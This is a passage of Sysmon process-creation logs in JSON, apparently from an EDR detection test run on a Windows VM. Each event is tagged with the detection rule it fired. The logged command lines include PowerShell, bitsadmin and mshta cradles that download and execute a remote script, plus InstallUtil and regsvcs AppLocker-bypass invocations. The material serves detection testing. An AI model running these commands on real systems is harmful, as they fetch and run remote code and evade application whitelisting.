","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-660A-5D3F-0000-0010B9E08500","ParentProcessId":3184,"ProcessGuid":"747F3D96-660A-5D3F-0000-0010FFF28500","ProcessId":700,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:32:58.940"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4890,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:32:59.234755Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Windows PowerShell Web Request"],"event":{"Event":{"EventData":{"CommandLine":"cmd /c powershell -c \"Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /C \"C:\\ProgramData\\ssh\\runtests.bat\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6609-5D3F-0000-00109FBF8500","ParentProcessId":1208,"ProcessGuid":"747F3D96-660F-5D3F-0000-001055378600","ProcessId":2948,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:33:03.238"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4893,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:33:03.254713Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Bitsadmin Download"],"event":{"Event":{"EventData":{"CommandLine":"bitsadmin.exe /transfer \"JobName\" https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt \"C:\\Windows\\system32\\Default_File_Path.ps1\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"BITS administration utility","FileVersion":"7.8.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=5DEB6EC7BB9BD0C85BBE91CBFD92BDC774FE5F8A,MD5=5CD8838F1E275B0C8EADF4B755C04E4F,SHA256=03C7E317E277BBD6C9C1159F8718A9D302E6F78E0D80C09D52A994B7598C0F30,IMPHASH=B0A3CFF8CFDE112945189719F82F9EA9","Image":"C:\\Windows\\System32\\bitsadmin.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"cmd /c bitsadmin.exe /transfer \"JobName\" https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt \"C:\\Windows\\system32\\Default_File_Path.ps1\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-660F-5D3F-0000-00109B328600","ParentProcessId":6020,"ProcessGuid":"747F3D96-660F-5D3F-0000-00100F4F8600","ProcessId":3896,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:33:03.667"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4894,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:33:03.886611Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Bitsadmin Job via PowerShell","Windows PowerShell Web Request"],"event":{"Event":{"EventData":{"CommandLine":"powershell -c \"Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows PowerShell","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"cmd /c powershell -c \"Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-660F-5D3F-0000-001055378600","ParentProcessId":2948,"ProcessGuid":"747F3D96-660F-5D3F-0000-00106B508600","ProcessId":6720,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:33:03.695"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4895,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:33:03.966393Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Possible Applocker Bypass"],"event":{"Event":{"EventData":{"CommandLine":"cmd /c C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /C \"C:\\ProgramData\\ssh\\runtests.bat\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6609-5D3F-0000-00109FBF8500","ParentProcessId":1208,"ProcessGuid":"747F3D96-6614-5D3F-0000-001093CE8600","ProcessId":108,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:33:08.174"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4897,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:33:08.202018Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Possible Applocker Bypass"],"event":{"Event":{"EventData":{"CommandLine":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":".NET Framework installation utility","FileVersion":"4.7.3190.0 built by: NET472REL1LAST_C","Hashes":"SHA1=1BEB7CDC82F57269A4AD123BE7F8B72F7F1B4630,MD5=7CCB088EEFBF464D0A467D0FF4C619DA,SHA256=0389427DA1D97388D89F28C2D856CD871FC200562C51749C6F6EF4FED9087FAE,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744","Image":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\InstallUtil.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"cmd /c C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6614-5D3F-0000-001093CE8600","ParentProcessId":108,"ProcessGuid":"747F3D96-6614-5D3F-0000-0010BFD98600","ProcessId":5696,"Product":"Microsoft® .NET Framework","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:33:08.415"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4899,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:33:08.446374Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Possible Applocker Bypass"],"event":{"Event":{"EventData":{"CommandLine":"cmd /c C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /C \"C:\\ProgramData\\ssh\\runtests.bat\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6609-5D3F-0000-00109FBF8500","ParentProcessId":1208,"ProcessGuid":"747F3D96-6619-5D3F-0000-0010FDE78600","ProcessId":5116,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:33:13.169"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4900,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:33:13.214691Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Rundll32 Activity"],"event":{"Event":{"EventData":{"CommandLine":"cmd /c mshta.exe javascript:a=GetObject(\"script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct\").Exec();close();","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /C \"C:\\ProgramData\\ssh\\runtests.bat\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6609-5D3F-0000-00109FBF8500","ParentProcessId":1208,"ProcessGuid":"747F3D96-661E-5D3F-0000-0010A3148700","ProcessId":776,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:33:18.241"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4902,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:33:18.286776Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Mshta JavaScript Execution","Suspicious Rundll32 Activity"],"event":{"Event":{"EventData":{"CommandLine":"mshta.exe javascript:a=GetObject(\"script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct\").Exec();close();","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Microsoft (R) HTML Application host","FileVersion":"11.00.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=DD8B22ACEA424823BB64ABF71F61A03D41177C38,MD5=F328FDCFF05BF02C2C986D52AED8BC2A,SHA256=E616C5CE71886652C13E2E1FA45A653B44D492B054F16B15A38418B8507F57C7,IMPHASH=42DA177DE2FAA97C3DFAEC9562772A7F","Image":"C:\\Windows\\System32\\mshta.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"cmd /c mshta.exe javascript:a=GetObject(\"script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct\").Exec();close();","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-661E-5D3F-0000-0010A3148700","ParentProcessId":776,"ProcessGuid":"747F3D96-661E-5D3F-0000-00107F248700","ProcessId":3164,"Product":"Internet Explorer","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:33:18.451"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4904,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:33:18.583990Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Windows PowerShell Web Request"],"event":{"Event":{"EventData":{"CommandLine":"cmd /c powershell -c \"(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /C \"C:\\ProgramData\\ssh\\runtests.bat\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6609-5D3F-0000-00109FBF8500","ParentProcessId":1208,"ProcessGuid":"747F3D96-6623-5D3F-0000-001011F68700","ProcessId":5816,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:33:23.170"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4910,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:33:23.215719Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","PowerShell Download from URL","Encoded PowerShell Command Line","Windows PowerShell Web Request"],"event":{"Event":{"EventData":{"CommandLine":"powershell -c \"(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows PowerShell","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"cmd /c powershell -c \"(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6623-5D3F-0000-001011F68700","ParentProcessId":5816,"ProcessGuid":"747F3D96-6623-5D3F-0000-0010BC068800","ProcessId":3000,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:33:23.380"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4912,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:33:23.507565Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Possible Applocker Bypass"],"event":{"Event":{"EventData":{"CommandLine":"cmd /c C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe AllTheThings.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /C \"C:\\ProgramData\\ssh\\runtests.bat\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6609-5D3F-0000-00109FBF8500","ParentProcessId":1208,"ProcessGuid":"747F3D96-6628-5D3F-0000-001067768800","ProcessId":1296,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:33:28.197"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4916,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:33:28.250664Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Possible Applocker Bypass"],"event":{"Event":{"EventData":{"CommandLine":"cmd /c C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\regsvcs.exe AllTheThings.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /C \"C:\\ProgramData\\ssh\\runtests.bat\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6609-5D3F-0000-00109FBF8500","ParentProcessId":1208,"ProcessGuid":"747F3D96-6628-5D3F-0000-001062788800","ProcessId":2040,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:33:28.222"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4917,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:33:28.374373Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Possible Applocker Bypass"],"event":{"Event":{"EventData":{"CommandLine":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe AllTheThings.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Microsoft .NET Services Installation Utility","FileVersion":"4.7.3190.0 built by: NET472REL1LAST_C","Hashes":"SHA1=7D163D3FA313FC69F2510168EFC1240993AAF7D2,MD5=D15EF1C50607B320C31B5697AD126660,SHA256=549CBF63163B33A1CAD7703D4C8A1EF66EEDFFF249A7ECB181C5D2BD78DA2899,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744","Image":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"cmd /c C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe AllTheThings.dll","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6628-5D3F-0000-001067768800","ParentProcessId":1296,"ProcessGuid":"747F3D96-6628-5D3F-0000-00105B918800","ProcessId":4860,"Product":"Microsoft® .NET Framework","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:33:28.618"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4918,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:33:29.341503Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Possible Applocker Bypass"],"event":{"Event":{"EventData":{"CommandLine":"cmd /c C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\regsvcs.exe AllTheThings.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /C \"C:\\ProgramData\\ssh\\runtests.bat\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6609-5D3F-0000-00109FBF8500","ParentProcessId":1208,"ProcessGuid":"747F3D96-6628-5D3F-0000-0010B1968800","ProcessId":5708,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:33:28.756"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4919,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:33:29.565736Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Possible Applocker Bypass"],"event":{"Event":{"EventData":{"CommandLine":"cmd /c 